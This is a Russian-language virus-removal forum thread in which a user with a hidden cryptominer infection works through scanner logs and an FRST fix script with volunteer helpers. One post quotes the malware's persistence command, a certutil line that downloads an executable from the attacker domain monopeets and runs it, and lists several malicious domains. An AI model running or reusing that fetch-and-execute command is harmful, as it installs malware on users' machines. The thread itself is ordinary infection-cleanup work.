Форум программистов, компьютерный форум, киберфорум
Лечение компьютерных вирусов
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск Заказать работу  
 
 
Рейтинг 4.59/29: Рейтинг темы: голосов - 29, средняя оценка - 4.59
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11

Скрытый майнер, повышенная нагрузка, переадресация

27.11.2018, 00:14. Показов 6332. Ответов 20
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Начну с истории заражения и попыток лечения.
По своей глупости скачал файл с непроверенного источника. После запуска, увидел резко подскочившее потребление трафика и нагрузку на систему, потому оперативно выдернул сеть и далее работал изолированно.
Первым делом в диспетчере увидел новые процессы:
Wup.exe
Kplnixo.exe
и csrss, который поглощал больше обычного.
диспетчер вывел меня на C:\User\AppData\Roaming\temp где эти 3 приложения и тусовались.
На рабочем столе появились новые ярлыки, какой-то blackempire, ярлык на порносайт и ярлык с рандомнеймом. А старые получили приписку к выполнению команды запуска.
Всё это добро вело уже в другую директорию C:\ProgramData\EpicNet
После удаления файлов и очистки реестра от связанных с ними записей, я вернул сеть и скачал Dr.Web CureIt, который не нашел угроз.

Через некоторое время, свернув игру я заметил, что фпс жутко просел, проводником, да и всем остальным, просто невозможно было пользоваться, лагал курсор. Открыв диспетчер, комп постепенно успокоился и вышел на нормальное потребление ресурсов. В диспетчере же нагрузка CPU была процентов на 10 выше, чем сумма по приложениям, как и память, 1.5Гб составляли 30% от 16Гб.

После долгого отслеживания процессов уже в Process Hacker, удалось выявить старых друзей, но в более далеких и скрытых директориях:
Wup.exe
Kplnixo.exe

windefender.exe (Который оказался без цифровых подписей, и в нетипичной директории /Windows/)
CloudNet.exe (EpicNet)
csrss.exe
SheduleUpdate.exe
(тусовался с ними в одной директории, без цифровых подписей)

В реестре они все снова прописались, но уже удалось найти раздел, в котором описаны были все их пути размножения.
Более того, были найдены ссылки на левые ресурсы
monopeets com
protoblues com
weekdanys com
okonewacon com
blackempirebuild com


Все эти адреса были успешно вписаны в hosts, но на всякий случай глянул в netstat да и в раздел Network в Process Hacker'е.
Многие процессы продублированы, с переходом на внешний адрес monopeets com.

Попробовал зайти в безопасном режиме, дополнительной нагрузки нет.
Попробовал зайти в безопасном режиме с загрузкой сетевых драйверов, появляются эти попытки зайти на monopeets, но доп.нагрузки вроде бы нет.

Пытался сканировать всю систему и реестр по всем ключевым словам и путям, везде чисто. Нашел упоминание monopeets в логах очистки RegOrganizer, в качестве команды для CMD
XML
1
<command>"cmd.exe" /C certutil.exe -urlcache -split -f monopeets com/app/app/exe C:\Users\SUPRIME'AppData\Local\Temp\csrss\scheduled.exe &amp;&amp; C:\Users\SUPRIME'AppData\Local\Temp\csrss\scheduled.exe /31340</command>
Уже проверялся:
Dr.Web CureIt - Ничего кроме модифицированного мной Hosts не видит
MalwareBytes - Увидел парочку троянов, корень проблемы так и не нашел.
AVZ - ничего, что могло бы вызвать такие последствия.

Система:
Win10 (17763) (Офф установка с рандомным ключиком). Win defender кастрирован вручную. Обновы должны быть свежими (ведь шиндовс обошел политики и службы, да сам обновился, хотя я был против).

Из главных симптомов на данный момент:
  • Во время повышенных нагрузок, что-то дополнительно нагружает систему, вплоть до дерганья изображения в диспетчере или проводнике. (особенно заметно при просмотре видео на втором экране).
  • При выключении или перезагрузке компа, всплывает окно с предложением завершить процесс G, или же просто пустой процесс.
    (поиск этого процесса, файла, ключа не дали результатов)
  • Огромное количество сетевых процессов, которые жаждут попасть на monopeets

monopeets я гуглил, та единственная инструкция по этому вирусу не сходиться почти ни в чем.

Вложил:
Лог проверки
Скриншот реестра, где указывались вредоносные сайты
Скриншот processHacker'а Network в безопасном режиме.
Миниатюры
Скрытый майнер, повышенная нагрузка, переадресация   Скрытый майнер, повышенная нагрузка, переадресация  
Вложения
Тип файла: zip CollectionLog-2018.11.27-02.08.zip (140.6 Кб, 7 просмотров)
0
Programming
Эксперт
39485 / 9562 / 3019
Регистрация: 12.04.2006
Сообщений: 41,671
Блог
27.11.2018, 00:14
Ответы с готовыми решениями:

Возможно, что подцепил скрытый майнер. При открытии диспетчера задач нагрузка на процессор резко падает на 30-50%
Есть подозрения, что на моем компьютере установлен скрытый майнер. В состоянии бездействия процессор греется на 45 градусов. Если работаю в...

Скрытый майнер?
День добрый, недавно наткнулся на этот ролик, https://www.youtube.com/watch?v=d8fuCQ4IYC8, где говорится что скрытые майнеры могут...

Скрытый майнер
Добрый день! Загрузка процессора и памяти без видимых причин. Логи собраны в безопасном режиме. С уважением!

20
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
27.11.2018, 10:10
Здравствуйте!

Файл
d:\crypt\bio_wallet\bio_wallet\biocoin-qt.exe
вам известен?

Дополнительно подготовьте и прикрепите лог сканирования AdwCleaner.
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
27.11.2018, 15:57  [ТС]
Известен. Уже больше года у меня висит кошелек biocoin (есть парочка резервных копий по всем дискам)

Уже запускал два раза до сообщения, запустил снова, все 3 лога прикрепил.
Вложения
Тип файла: txt AdwCleaner[S01].txt (1.3 Кб, 0 просмотров)
Тип файла: txt AdwCleaner[S00].txt (1.3 Кб, 0 просмотров)
Тип файла: txt AdwCleaner[C00].txt (1.5 Кб, 1 просмотров)
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
27.11.2018, 16:17
Скачайте AutorunsVTchecker, извлеките из архива и запустите. Не закрывайте окно до окончания работы программы.

Подготовьте лог uVS.
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
27.11.2018, 16:57  [ТС]
Прикрепил результат Autoruns и uvs
Вложения
Тип файла: 7z SUPRIMEKAIR1911_2018-11-27_20-50-19_v4.1.7z (825.5 Кб, 1 просмотров)
Тип файла: rar SUPRIMEKAIR1911.rar (229.4 Кб, 0 просмотров)
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
27.11.2018, 17:11
Цитата Сообщение от SUPRIMEkair Посмотреть сообщение
Огромное количество сетевых процессов
Отключите в FF все дополнения/расширения и проверьте. Результат сообщите.
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
27.11.2018, 20:51  [ТС]
Тот скрин был сделан в безопасном режиме, из запущенных был только браузер. Дублируются с переадресацией не только процессы FF, но и других приложений, даже тех, которых не было в момент заражения.
Больше всего напрягает explorer.exe, с чего бы ему вообще ломиться в сеть?

Удалил все дополнения, и отключил FF, скрин ниже.
При нагрузке опять пошли тормоза.
Миниатюры
Скрытый майнер, повышенная нагрузка, переадресация  
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
28.11.2018, 09:13
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
28.11.2018, 18:00  [ТС]
Прикрепил
Вложения
Тип файла: rar FRST.rar (29.1 Кб, 2 просмотров)
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
29.11.2018, 09:21
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Code
    1
    2
    3
    4
    5
    6
    7
    8
    
    Start::
    CreateRestorePoint:
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.


Если проблема сохранится, проверьте наблюдается ли она в безопасном режиме с поддержкой сети.
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
29.11.2018, 11:02  [ТС]
Лог вложил.
Скрин из безопасного режима (с подгрузкой сетевых драйверов)
Миниатюры
Скрытый майнер, повышенная нагрузка, переадресация  
Вложения
Тип файла: txt Fixlog.txt (1.6 Кб, 1 просмотров)
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
29.11.2018, 11:19
К сети подключаетесь через роутер? Если да, какая модель и сколько устройств подключено?
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
29.11.2018, 19:46  [ТС]
Роутер ASUS RT-AC51U
Подключен только ПК и смартфон
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
29.11.2018, 21:50
Цитата Сообщение от SUPRIMEkair Посмотреть сообщение
и смартфон
Тут подобных проблем не наблюдаете?
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
30.11.2018, 00:19  [ТС]
Вроде бы работает нормально.
Глянул с помощью Network Connections, ничего подозретельного нет.

Раз уж подозрение на роутер, стряхнул пыль со старого ноута, никакой лишней активности замечено не было. (хотя он сам по себе рассадник разного рода "живности")
Миниатюры
Скрытый майнер, повышенная нагрузка, переадресация   Скрытый майнер, повышенная нагрузка, переадресация  
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
30.11.2018, 09:17
Проблемный компьютер запустите в безопасном режиме с поддержкой сети и проверьте. Результат сообщите.
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
01.12.2018, 05:00  [ТС]
С прошлой проверки в безопасном режиме ничего не поменялось.
0
Вирусоборец
 Аватар для Sandor
22505 / 15947 / 3092
Регистрация: 08.10.2012
Сообщений: 64,978
01.12.2018, 20:29
Виноват, не посмотрел, что мы это уже проверяли. Подождите некоторое время.
0
Вирусоборец
 Аватар для akok
2839 / 857 / 29
Регистрация: 01.09.2009
Сообщений: 1,043
03.12.2018, 10:04
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите [/B]"Ок"[B]
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме
0
0 / 0 / 0
Регистрация: 26.11.2018
Сообщений: 11
19.12.2018, 10:00  [ТС]
Извиняюсь, что так долго.
Вложения
Тип файла: rar Reports.rar (1.8 Кб, 0 просмотров)
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
inter-admin
Эксперт
29715 / 6470 / 2152
Регистрация: 06.03.2009
Сообщений: 28,500
Блог
19.12.2018, 10:00
Помогаю со студенческими работами здесь

Скрытый майнер
В последнее время начал подлагивать компютер. И заметил что как только открываю диспетчер задач все возвращается в норме.

Скрытый майнер
Пытался найти на форумах инфу, но не нашел. Симптомы обычные: При открытии диспечера задач, ничего не находит. adwcleaner не...

Скрытый майнер
Всем привет,с недавних пор начал нагружаться процессор. Открываю диспетчер задач,чтобы чекнуть,что нагружает процессор,но после открытия...

Скрытый майнер?
Добрый день! Грелся проц в отсутствие нагрузки, сегодня поняла, что при запуске диспетчера задач греться перестает, а сам диспетчер...

Вероятно скрытый майнер
В общем он работает только тогда, когда я играю, если игра свёрнута или я пытаюсь мониторить ресурсы средствами самой игры - он...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
20
Ответ Создать тему
Новые блоги и статьи
Отчёт о затраченных материалах за определенный период с макетом печатной формы
Maks 21.04.2026
Отчёт из решения ниже размещён в конфигурации КА2. Задача: разработка отчёта по затраченным материалам за определённый период, с возможностью вывода печатной формы отчёта с шапкой и подвалом. В. . .
Отчёт о спецтехнике находящейся в ремонте
Maks 20.04.2026
Отчёт из решения ниже размещен в конфигурации КА2. Задача: отобразить спецтехнику, которая на данный момент находится в ремонте. Есть нетиповой документ "Заявка на ремонт спецтехники" который. . .
Памятка для бота и "визитка" для читателей "Semantic Universe Layer (Слой семантической вселенной)"
Hrethgir 19.04.2026
Сгенерировано для краткого описания по случаю сборки и компиляции скелета серверного приложения. И пусть после этого скажут, что статьи сгенерированные AI - туфта и не интересно. И это не реклама -. . .
Запрет удаления строк ТЧ документа при определённом условии
Maks 19.04.2026
Алгоритм из решения ниже реализован на примере нетипового документа "Аккумуляторы", разработанного в конфигурации КА2. У данного документа есть ТЧ, в которой в зависимости от прав доступа. . .
Модель заражения группы наркоманов
alhaos 17.04.2026
Условия задачи сформулированы тут Суть: - Группа наркоманов из 10 человек. - Только один инфицирован ВИЧ. - Колются одной иглой. - Колются раз в день. - Колются последовательно через. . .
Мысли в слух. Про "навсегда".
kumehtar 16.04.2026
Подумалось тут, что наверное очень глупо использовать во всяких своих установках понятие "навсегда". Это очень сильное понятие, и я только начинаю понимать край его смысла, не смотря на то что давно. . .
My Business CRM
MaGz GoLd 16.04.2026
Всем привет, недавно возникла потребность создать CRM, для личных нужд. Собственно программа предоставляет из себя базу данных клиентов, в которой можно фиксировать звонки, стадии сделки, а также. . .
Знаешь почему 90% людей редко бывают счастливыми?
kumehtar 14.04.2026
Потому что они ждут. Ждут выходных, ждут отпуска, ждут удачного момента. . . а удачный момент так и не приходит.
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru